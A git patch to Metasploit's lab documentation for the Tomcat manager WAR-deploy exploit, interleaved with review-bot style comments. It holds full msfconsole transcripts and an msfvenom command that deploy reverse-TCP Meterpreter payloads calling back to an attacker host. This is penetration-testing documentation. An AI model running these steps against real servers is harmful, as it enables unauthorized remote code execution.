From bed08db43c8f42befba7fb388e96f4e4f89d2b1c Mon Sep 17 00:00:00 2001 From: h00die Date: Sat, 14 Jan 2017 19:17:37 -0500 Subject: [PATCH] more to edit --- .../exploit/multi/http/tomcat_mgr_deploy.md | 499 ++++++++++++------ 1 file changed, 331 insertions(+), 168 deletions(-) diff --git a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md index 4751c7d86f..6dd5630a1b 100644 --- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md +++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md @@ -2,6 +2,9 @@ This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens. This documentation is broken down by OS, Tomcat version, then privilege to show exploitation at each way. +# Cleanup +It should be stated outright that the exploit does NOT undeploy the shellcode from Tomcat. This must be done manually. + ## Windows (xp sp2) ### Tomcat 6 (6.0.48) #### Setup 
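Review bot: the new `# Cleanup` paragraph states that the exploit does NOT undeploy the WAR, but every module transcript in this same patch prints `[*] Undeploying scEYoK0 ...` (or the equivalent line for its random WAR name), so the claim as written contradicts the documented module output; scope the statement to the manual `/manager/html` deployment at the bottom of the file, where `meterp.war` really does stay deployed until `Undeploy` is clicked, or explain what the module leaves behind despite the undeploy. `# Cleanup` is also a level-1 heading placed ahead of `## Windows (xp sp2)` while the existing OS sections use `##`, so it reads as part of the page intro; use `## Cleanup`, and prefer `WAR file` to `shellcode`, since what gets deployed is a JSP packaged in a WAR.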
@@ -9,10 +12,57 @@ This documentation is broken down by OS, Tomcat version, then privilege to show 1. Download and install the pre-req [Java7](www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html) 2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe) -The install was default, other than adding a user during install. No other options were changed. +The install was default, other than adding a user during install. No other options were changed. The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax. +For this exploitation, it was changed to simply `manager` -#### text/script interface +#### text/script Interface +1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml` to add the following under the `` line: + ``` + + + ``` + +2. Restart Tomcat service +3. Exploit: + + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 + rhost => 192.168.2.108 + msf exploit(tomcat_mgr_deploy) > set verbose true + verbose => true + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + payload => java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set target 1 + target => 1 + msf exploit(tomcat_mgr_deploy) > set rport 8086 + rport => 8086 + msf exploit(tomcat_mgr_deploy) > set path /manager + path => /manager + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Java Universal" + [*] Uploading 6071 bytes as scEYoK0.war ... + [!] No active DB -- Credential data will not be saved! 
+ [*] Executing /scEYoK0/jgj6tWcImjhc7rH2F4TDjCpXG.jsp... + [*] Undeploying scEYoK0 ... + [*] Sending stage (49409 bytes) to 192.168.2.108 + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500 + + meterpreter > sysinfo + Computer : winxp + OS : Windows XP 5.1 (x86) + Meterpreter : java/windows + + ``` ### Tomcat 7 (7.0.73) #### Setup 
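Review bot: typo in the edited setup paragraph: `assgined` should be `assigned`, and the new sentence `For this exploitation, it was changed to simply \`manager\`` has no terminating period. As shown in this diff the fenced block under step 1 of the Tomcat 6 text/script section contains no `role` or `user` entries, so confirm that the `role rolename="manager"` line and the `user` line granting `roles="manager"` with the `tomcat`/`tomcat` credentials used in the transcript survived the edit; without them the step cannot be followed. The step text should also state that `path` is `/manager` and `rport` is `8086` here, since at present the transcript is the only place the reader learns that Tomcat 6 does not use `/manager/text`.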
@@ -23,7 +73,57 @@ The install was default, other than adding a user during install. No other opti Of note, while the user was given `manager-gui` permissions, they didn't actually define that role. So the `/manager/html` page was visible, but deploying from there wasn't possible. -#### text/script interface +#### text/script Interface +1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml` to add the following under the `` line: + + ``` + + + ``` + +2. Restart the service +3. Exploitation: + + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 + rhost => 192.168.2.108 + msf exploit(tomcat_mgr_deploy) > set path /manager/text + path => /manager/text + msf exploit(tomcat_mgr_deploy) > set verbose true + verbose => true + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set rport 8087 + rport => 8087 + msf exploit(tomcat_mgr_deploy) > set payload java/ + set payload java/meterpreter/bind_tcp set payload java/meterpreter/reverse_tcp set payload java/shell_reverse_tcp + set payload java/meterpreter/reverse_http set payload java/shell/bind_tcp + set payload java/meterpreter/reverse_https set payload java/shell/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + payload => java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set target 1 + target => 1 + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Java Universal" + [*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ... + [!] No active DB -- Credential data will not be saved! + [*] Executing /Cl6t6gurtwIO59zV3Lt6/qTIP.jsp... 
+ [*] Undeploying Cl6t6gurtwIO59zV3Lt6 ... + [*] Sending stage (49409 bytes) to 192.168.2.108 + [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500 + + meterpreter > sysinfo + Computer : winxp + OS : Windows XP 5.1 (x86) + Meterpreter : java/windows + ``` ### Tomcat 8 (8.0.39) #### Setup 
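Review bot: the Tomcat 7 transcript contains tab-completion output that was never run as a command: the line `set payload java/` and the two lines listing `java/meterpreter/bind_tcp ... java/shell/reverse_tcp` should be dropped, since the actual `set payload java/meterpreter/reverse_tcp` follows immediately. The heading rename to `#### text/script Interface` is applied only here and in the Tomcat 6 section, while the Tomcat 8 and Linux sections keep `#### text/script interface` and `#### gui interface`; pick one capitalisation for all of them. As in the Tomcat 6 section, the fenced block under step 1 shows no `role`/`user` lines in this diff, so verify the committed file has them.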
@@ -37,156 +137,166 @@ So the /manager/html page was visible, but deploying from there wasn't possible. #### text/script interface -1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following: -``` - - -``` +1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following under the ` use exploit/multi/http/tomcat_mgr_deploy -msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 -rhost => 192.168.2.108 -msf exploit(tomcat_mgr_deploy) > set rport 8088 -rport => 8088 -msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp -payload => java/meterpreter/reverse_tcp -msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 -lhost => 192.168.2.117 -msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat -HttpPassword => tomcat -msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat -HttpUsername => tomcat -msf exploit(tomcat_mgr_deploy) > set target 1 -target => 1 -msf exploit(tomcat_mgr_deploy) > exploit -msf exploit(tomcat_mgr_deploy) > set path /manager/text -path => /manager/text -msf exploit(tomcat_mgr_deploy) > exploit + ``` + + + ``` -[*] Started reverse TCP handler on 192.168.2.117:4444 -[*] Using manually select target "Java Universal" -[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ... -[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp... -[*] Undeploying c6TYmkd8YAe8LqKQhSCr ... -[*] Sending stage (49409 bytes) to 192.168.2.108 -[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500 - -meterpreter > sysinfo -Computer : winxp -OS : Windows XP 5.1 (x86) -Meterpreter : java/windows -``` +2. Restart the service +3. 
Exploitation: + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 + rhost => 192.168.2.108 + msf exploit(tomcat_mgr_deploy) > set rport 8088 + rport => 8088 + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + payload => java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set target 1 + target => 1 + msf exploit(tomcat_mgr_deploy) > exploit + msf exploit(tomcat_mgr_deploy) > set path /manager/text + path => /manager/text + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Java Universal" + [*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ... + [*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp... + [*] Undeploying c6TYmkd8YAe8LqKQhSCr ... + [*] Sending stage (49409 bytes) to 192.168.2.108 + [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500 + + meterpreter > sysinfo + Computer : winxp + OS : Windows XP 5.1 (x86) + Meterpreter : java/windows + ``` ## Linux ### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit #### Setup -``` -sudo apt-get install tomcat6 tomcat6-admin -``` + +1. Install Tomcat and dependencies: `sudo apt-get install tomcat6 tomcat6-admin` + #### Exploit 1. Edit `/etc/tomcat6/tomcat-users.xml` to add the following: -``` - - -``` + + ``` + + + ``` + 2. Restart Tomcat: `sudo service tomcat6 restart` 3. 
Exploit: -``` -msf > use exploit/multi/http/tomcat_mgr_deploy -msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156 -rhost => 192.168.2.156 -msf exploit(tomcat_mgr_deploy) > set rport 8080 -rport => 8080 -msf exploit(tomcat_mgr_deploy) > set verbose true -verbose => true -msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat -HttpUsername => tomcat -msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat -HttpPassword => tomcat -msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp -payload => linux/x86/mettle/reverse_tcp -msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 -lhost => 192.168.2.117 -msf exploit(tomcat_mgr_deploy) > set target 3 -target => 3 -msf exploit(tomcat_mgr_deploy) > exploit -[*] Started reverse TCP handler on 192.168.2.117:4444 -[*] Using manually select target "Linux x86" -[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ... -[!] No active DB -- Credential data will not be saved! -[*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp... -[*] Transmitting intermediate stager...(106 bytes) -[*] Sending stage (335800 bytes) to 192.168.2.156 -[*] Undeploying 9bj4IYa66cSpdK ... 
-[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500 - -meterpreter > sysinfo -Computer : Ubuntu14.04 -OS : Ubuntu 14.04 (Linux 4.2.0-27-generic) -Architecture : x64 -Meterpreter : x86/linux -``` + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156 + rhost => 192.168.2.156 + msf exploit(tomcat_mgr_deploy) > set rport 8080 + rport => 8080 + msf exploit(tomcat_mgr_deploy) > set verbose true + verbose => true + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp + payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set target 3 + target => 3 + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Linux x86" + [*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ... + [!] No active DB -- Credential data will not be saved! + [*] Executing /9bj4IYa66cSpdK/g3Yxbv3.jsp... + [*] Transmitting intermediate stager...(106 bytes) + [*] Sending stage (335800 bytes) to 192.168.2.156 + [*] Undeploying 9bj4IYa66cSpdK ... + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500 + + meterpreter > sysinfo + Computer : Ubuntu14.04 + OS : Ubuntu 14.04 (Linux 4.2.0-27-generic) + Architecture : x64 + Meterpreter : x86/linux + ``` ### Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit Of note, as of Tomcat 7, the permission role 'manager' has been divided into several sub-roles. Each sub role the user has will change which `path` variable for exploitation. + #### Setup -1. Tomcat 7: `apt-get install tomcat7 tomcat7-admin` +1. 
Install Tomcat and dependencies: `apt-get install tomcat7 tomcat7-admin` #### text/script interface 1. Edit `/etc/tomcat7/tomcat-users.xml` to add: -``` - - -``` + + ``` + + + ``` + 2. Restart Tomcat: `sudo service tomcat7 restart` 1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy] ` as opposed to `403 Access Denied` 3. Exploit: -``` -msf > use exploit/multi/http/tomcat_mgr_deploy -msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 -rhost => 192.168.2.118 -msf exploit(tomcat_mgr_deploy) > set rport 8087 -rport => 8087 -msf exploit(tomcat_mgr_deploy) > set target 3 -target => 3 -msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp -payload => linux/x86/mettle/reverse_tcp -msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 -lhost => 192.168.2.117 -msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat -HttpUsername => tomcat -msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat -HttpPassword => tomcat -msf exploit(tomcat_mgr_deploy) > set verbose true -verbose => true -msf exploit(tomcat_mgr_deploy) > exploit -msf exploit(tomcat_mgr_deploy) > set path /manager/text -path => /manager/text -msf exploit(tomcat_mgr_deploy) > exploit -[*] Started reverse TCP handler on 192.168.2.117:4444 -[*] Using manually select target "Linux x86" -[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ... -[!] No active DB -- Credential data will not be saved! -[*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp... -[*] Undeploying 9QymzSGGU0H4e ... 
-[*] Transmitting intermediate stager...(106 bytes) -[*] Sending stage (335800 bytes) to 192.168.2.118 -[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500 + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 + rhost => 192.168.2.118 + msf exploit(tomcat_mgr_deploy) > set rport 8087 + rport => 8087 + msf exploit(tomcat_mgr_deploy) > set target 3 + target => 3 + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp + payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set verbose true + verbose => true + msf exploit(tomcat_mgr_deploy) > exploit + msf exploit(tomcat_mgr_deploy) > set path /manager/text + path => /manager/text + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Linux x86" + [*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ... + [!] No active DB -- Credential data will not be saved! + [*] Executing /9QymzSGGU0H4e/Mfz7dGecAsKTjSxfZgBv.jsp... + [*] Undeploying 9QymzSGGU0H4e ... + [*] Transmitting intermediate stager...(106 bytes) + [*] Sending stage (335800 bytes) to 192.168.2.118 + [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500 + + meterpreter > sysinfo + Computer : 192.168.2.118 + OS : Ubuntu 16.04 (Linux 4.4.0-21-generic) + Architecture : x64 + Meterpreter : x86/linux + ``` -meterpreter > sysinfo -Computer : 192.168.2.118 -OS : Ubuntu 16.04 (Linux 4.4.0-21-generic) -Architecture : x64 -Meterpreter : x86/linux -``` #### gui interface Attempted to get the the GUI one to work, I wasn't able to. 
I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`. However, my attempts were unsuccessful. 
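Review bot: two of the re-indented transcripts (Windows Tomcat 8 and Ubuntu Tomcat 7) run `exploit` once before `set path /manager/text` and again after it, but the output of the first run is not shown, so the reader cannot see that the default path failed or why `/manager/text` is needed; either include that failure output or remove the redundant first `exploit` and say in the step text that the Tomcat 7+ text interface requires `path` set to `/manager/text`. Separately, the Tomcat 8 Windows step 1 line as it appears in this diff runs straight into the removed transcript (`to add the following under the \` use exploit/multi/http/tomcat_mgr_deploy`), so check that the committed line ends with the same `under the tomcat-users line:` wording as the Tomcat 6 and 7 steps; and the Ubuntu Tomcat 7 list is numbered `2.`, `1.`, `3.`, so renumber the verification step to `3.` and the exploit step to `4.`. The unchanged context `Attempted to get the the GUI one to work` has a doubled `the` worth fixing while this section is being touched.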
@@ -197,51 +307,104 @@ Of note, as of 7, the permission role 'manager' has been divided into several su #### text/script interface 1. Edit `/etc/tomcat8/tomcat-users.xml` to add: -``` - - -``` + ``` + + + ``` 2. Restart tomcat: `sudo service tomcat8 restart` 1. To verify the permissions are all set correctly, browse to `http://192.168.2.118:8087/manager/text/deploy`, and you should see `FAIL - Invalid parameters supplied for command [/deploy] ` as opposed to `403 Access Denied` 3. Exploit: -``` -msf > use exploit/multi/http/tomcat_mgr_deploy -msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 -rhost => 192.168.2.118 -msf exploit(tomcat_mgr_deploy) > set rport 8088 -rport => 8088 -msf exploit(tomcat_mgr_deploy) > set target 3 -target => 3 -msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp -payload => linux/x86/mettle/reverse_tcp -msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 -lhost => 192.168.2.117 -msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat -HttpUsername => tomcat -msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat -HttpPassword => tomcat -msf exploit(tomcat_mgr_deploy) > set verbose true -verbose => true -msf exploit(tomcat_mgr_deploy) > set path /manager/text -path => /manager/text -msf exploit(tomcat_mgr_deploy) > exploit - -[*] Started reverse TCP handler on 192.168.2.117:4444 -[*] Using manually select target "Linux x86" -[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ... -[!] No active DB -- Credential data will not be saved! -[*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp... -[*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ... 
-[*] Transmitting intermediate stager...(106 bytes) -[*] Sending stage (335800 bytes) to 192.168.2.118 -[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500 - -meterpreter > sysinfo -Computer : 192.168.2.118 -OS : Ubuntu 16.04 (Linux 4.4.0-59-generic) -Architecture : x64 -Meterpreter : x86/linux -``` + ``` + msf > use exploit/multi/http/tomcat_mgr_deploy + msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 + rhost => 192.168.2.118 + msf exploit(tomcat_mgr_deploy) > set rport 8088 + rport => 8088 + msf exploit(tomcat_mgr_deploy) > set target 3 + target => 3 + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp + payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 + lhost => 192.168.2.117 + msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat + HttpUsername => tomcat + msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat + HttpPassword => tomcat + msf exploit(tomcat_mgr_deploy) > set verbose true + verbose => true + msf exploit(tomcat_mgr_deploy) > set path /manager/text + path => /manager/text + msf exploit(tomcat_mgr_deploy) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Using manually select target "Linux x86" + [*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ... + [!] No active DB -- Credential data will not be saved! + [*] Executing /9s0fTUyPa2HJCDnod2wEQJ/ndAfDrUY.jsp... + [*] Undeploying 9s0fTUyPa2HJCDnod2wEQJ ... + [*] Transmitting intermediate stager...(106 bytes) + [*] Sending stage (335800 bytes) to 192.168.2.118 + [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500 + + meterpreter > sysinfo + Computer : 192.168.2.118 + OS : Ubuntu 16.04 (Linux 4.4.0-59-generic) + Architecture : x64 + Meterpreter : x86/linux + ``` #### gui interface Attempted to get the the GUI one to work, I wasn't able to. 
I believe you need to set the permission `manager-gui`, and possibly alter `PATH` to `/manager/html`. However, my attempts were unsuccessful. + + +# Manual Exploitation + +## Create payload +This was performed on Windows XP with the following permissions as the user that was used to login: +Tomcat 6.0.48: manager +Tomcat 7.0.73: manager-gui +Tomcat 8.0.39: manager-gui + +``` +/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war +Payload size: 6072 bytes +Final size of war file: 6072 bytes +Saved as: meterp.war +``` +## Setup Handler +``` +msf > use exploit/multi/handler +msf exploit(handler) > set payload java/meterpreter/reverse_tcp +payload => java/meterpreter/reverse_tcp +msf exploit(handler) > set lhost 192.168.2.117 +lhost => 192.168.2.117 +msf exploit(handler) > set lport 7777 +lport => 7777 +msf exploit(handler) > exploit + +[*] Started reverse TCP handler on 192.168.2.117:7777 +[*] Starting the payload handler... +``` +## Deploy +1. With a web browser, browse to `http://:/manager/html` +2. Enter credentials (no default) +3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy` +4. `meterp` should now be listed under `Applications`, meaning it was successfully deployed. +5. Either click the link for `/meterp` or browse to `http://:/meterp/` + +## Callback +After browsing to that page, code execution will happen, and your callback will hit. +``` +[*] Starting the payload handler... +[*] Sending stage (49409 bytes) to 192.168.2.108 +[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500 + +meterpreter > sysinfo +Computer : winxp +OS : Windows XP 5.1 (x86) +Meterpreter : java/windows +``` + +## Cleanup + +This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat. \ No newline at end of file
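Review bot: the three permission lines under `## Create payload` (`Tomcat 6.0.48: manager`, `Tomcat 7.0.73: manager-gui`, `Tomcat 8.0.39: manager-gui`) have no list markers and will render as one run-on paragraph; make them a `-` list. The Deploy URLs read `http://:/manager/html` and `http://:/meterp/` with nothing between `//` and `:`, so the host and port placeholders have been lost; use bracket-free placeholders such as `RHOST:RPORT` so they survive rendering. In the closing `## Cleanup`, split the comma splice `This will NOT remove the meterpreter from Tomcat, click \`Undeploy\` ...` into two sentences, use `Applications` to match step 4 of the Deploy list, and add the missing newline at end of file. `# Manual Exploitation` is also a level-1 heading while `## Windows` and `## Linux` are level 2, so the heading levels across the file should be aligned, and the Ubuntu Tomcat 8 list repeats the `2.`, `1.`, `3.` numbering noted for Tomcat 7.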